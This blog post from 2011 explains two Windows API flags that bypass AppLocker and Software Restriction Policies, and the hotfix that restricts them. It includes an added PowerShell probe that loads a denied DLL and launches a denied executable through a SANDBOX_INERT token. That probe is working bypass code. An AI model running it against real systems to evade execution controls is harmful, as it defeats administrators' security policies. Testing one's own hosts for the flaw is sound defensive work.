Security, et al

Randy's Blog on Infosec and Other Stuff


Back Door Bypasses AppLocker and Software Restriction Policies

Tue, 02 Aug 2011 13:40:25 GMT

Just a quick note about what looks like a pretty bad backdoor in Windows 7's AppLocker and the older Software Restriction Policies (SRP).  I've just learned about it and will be covering it in greater detail in tomorrow's webinar.

It's a backdoor Microsoft built into the DLL loader.  Pass the LOAD_IGNORE_CODE_AUTHZ_LEVEL flag to LoadLibraryEx and AppLocker and SRP skip their DLL checks for that library (the exemption covers only the DLL named in the call, not the DLLs it imports).  There's a similar flag, SANDBOX_INERT, for the CreateRestrictedToken API: a process started with a token created that way is not checked against AppLocker or SRP rules at all, so you can start a new process with AppLocker effectively disabled.  Microsoft's fix is hotfix KB2532445 for Windows 7 and Server 2008 R2 (the same restriction is built into later Windows versions): with the fix in place both flags are silently ignored unless the caller runs as LocalSystem or TrustedInstaller.
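
The two flags above, as an added example that is not code from the original post (nor Microsoft's): a PowerShell probe that P/Invokes LoadLibraryEx with LOAD_IGNORE_CODE_AUTHZ_LEVEL, builds a SANDBOX_INERT token with CreateRestrictedToken and starts a process with it through CreateProcessAsUser, and checks for the hotfix.  The function names, the Native wrapper class and the $BlockedDll/$BlockedExe paths are assumptions of mine; you must supply a DLL and an EXE of your own that your AppLocker policy (with DLL rules enabled) or SRP policy denies, with the DLL's bitness matching the PowerShell host.

```powershell
# Added example, not code from the original post. Probes whether this host honours
# LOAD_IGNORE_CODE_AUTHZ_LEVEL and SANDBOX_INERT. Run as a standard user under an
# AppLocker policy with DLL rules enabled (or an SRP policy) that denies the two
# placeholder paths you pass in: a DLL you built (same bitness as this PowerShell host)
# and an EXE, both sitting in a blocked location.
$Native = @'
using System;
using System.Runtime.InteropServices;
public static class Native {
    public const uint LOAD_IGNORE_CODE_AUTHZ_LEVEL = 0x00000010;  // LoadLibraryEx flag
    public const uint SANDBOX_INERT                = 0x00000002;  // CreateRestrictedToken flag
    public const uint TOKEN_ASSIGN_PRIMARY = 0x1, TOKEN_DUPLICATE = 0x2, TOKEN_QUERY = 0x8;

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr LoadLibraryEx(string path, IntPtr hFile, uint flags);
    [DllImport("kernel32.dll")] public static extern bool FreeLibrary(IntPtr h);
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool CreateRestrictedToken(IntPtr existing, uint flags,
        uint disableCount, IntPtr sidsToDisable, uint deleteCount, IntPtr privsToDelete,
        uint restrictCount, IntPtr sidsToRestrict, out IntPtr newToken);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessAsUser(IntPtr token, string app, string cmdLine,
        IntPtr procAttr, IntPtr threadAttr, bool inherit, uint flags, IntPtr env,
        string curDir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }
}
'@
Add-Type -TypeDefinition $Native

function Test-DllAuthzFlag {
    # Loads the denied DLL twice: normally (expected to fail with 1260,
    # ERROR_ACCESS_DISABLED_BY_POLICY) and with LOAD_IGNORE_CODE_AUTHZ_LEVEL.
    # The flag exempts only this DLL, not the DLLs it imports.
    param([Parameter(Mandatory=$true)][string]$BlockedDll)
    $plain = [Native]::LoadLibraryEx($BlockedDll, [IntPtr]::Zero, 0)
    $plainErr = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    if ($plain -ne [IntPtr]::Zero) { [void][Native]::FreeLibrary($plain) }
    $flagged = [Native]::LoadLibraryEx($BlockedDll, [IntPtr]::Zero, [Native]::LOAD_IGNORE_CODE_AUTHZ_LEVEL)
    $flaggedErr = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    if ($flagged -ne [IntPtr]::Zero) { [void][Native]::FreeLibrary($flagged) }
    New-Object PSObject -Property @{
        PlainLoadBlocked  = ($plain -eq [IntPtr]::Zero);   PlainLoadError = $plainErr
        FlagLoadSucceeded = ($flagged -ne [IntPtr]::Zero); FlagLoadError  = $flaggedErr
    }
}

function Start-SandboxInertProcess {
    # Makes a SANDBOX_INERT copy of our own primary token (no SIDs disabled or restricted,
    # no privileges removed) and starts the denied EXE with it. Where the flag is honoured
    # the process starts even though a plain Start-Process on the same file is blocked.
    param([Parameter(Mandatory=$true)][string]$BlockedExe)
    $tok = [IntPtr]::Zero; $inert = [IntPtr]::Zero
    $access = [Native]::TOKEN_ASSIGN_PRIMARY -bor [Native]::TOKEN_DUPLICATE -bor [Native]::TOKEN_QUERY
    if (-not [Native]::OpenProcessToken([Native]::GetCurrentProcess(), $access, [ref]$tok)) {
        throw "OpenProcessToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    if (-not [Native]::CreateRestrictedToken($tok, [Native]::SANDBOX_INERT, 0, [IntPtr]::Zero,
            0, [IntPtr]::Zero, 0, [IntPtr]::Zero, [ref]$inert)) {
        [void][Native]::CloseHandle($tok)
        throw "CreateRestrictedToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $si = New-Object Native+STARTUPINFO
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $procInfo = New-Object Native+PROCESS_INFORMATION
    $ok = [Native]::CreateProcessAsUser($inert, $BlockedExe, $null, [IntPtr]::Zero, [IntPtr]::Zero,
            $false, 0, [IntPtr]::Zero, $null, [ref]$si, [ref]$procInfo)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    [void][Native]::CloseHandle($inert); [void][Native]::CloseHandle($tok)
    if ($ok) { [void][Native]::CloseHandle($procInfo.hThread); [void][Native]::CloseHandle($procInfo.hProcess) }
    New-Object PSObject -Property @{ Started = $ok; ProcessId = $procInfo.dwProcessId; LastError = $err }
}

function Test-AuthzFlagHotfix {
    # KB2532445 (Windows 7 / Server 2008 R2) makes both flags no-ops unless the caller is
    # LocalSystem or TrustedInstaller; later Windows versions ship that restriction built in,
    # so $false here is only meaningful on those two OS versions.
    [bool](Get-HotFix -Id KB2532445 -ErrorAction SilentlyContinue)
}

# Usage (paths are placeholders for files your own policy denies):
#   Test-AuthzFlagHotfix
#   Test-DllAuthzFlag         -BlockedDll 'C:\Blocked\probe.dll'
#   Start-SandboxInertProcess -BlockedExe 'C:\Blocked\probe.exe'
```

On a host where the flags are still honoured, Test-DllAuthzFlag reports PlainLoadBlocked $true with error 1260 and FlagLoadSucceeded $true, and Start-SandboxInertProcess returns Started $true with a live process ID; with the fix in place FlagLoadSucceeded is $false and Started is $false, both with error 1260.  Run the probe as the standard user the policy is meant to constrain: the fix exempts LocalSystem and TrustedInstaller, so a result obtained from a SYSTEM service says nothing about what a user's process can do.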

Again, I'll have more on this in tomorrow's webinar.



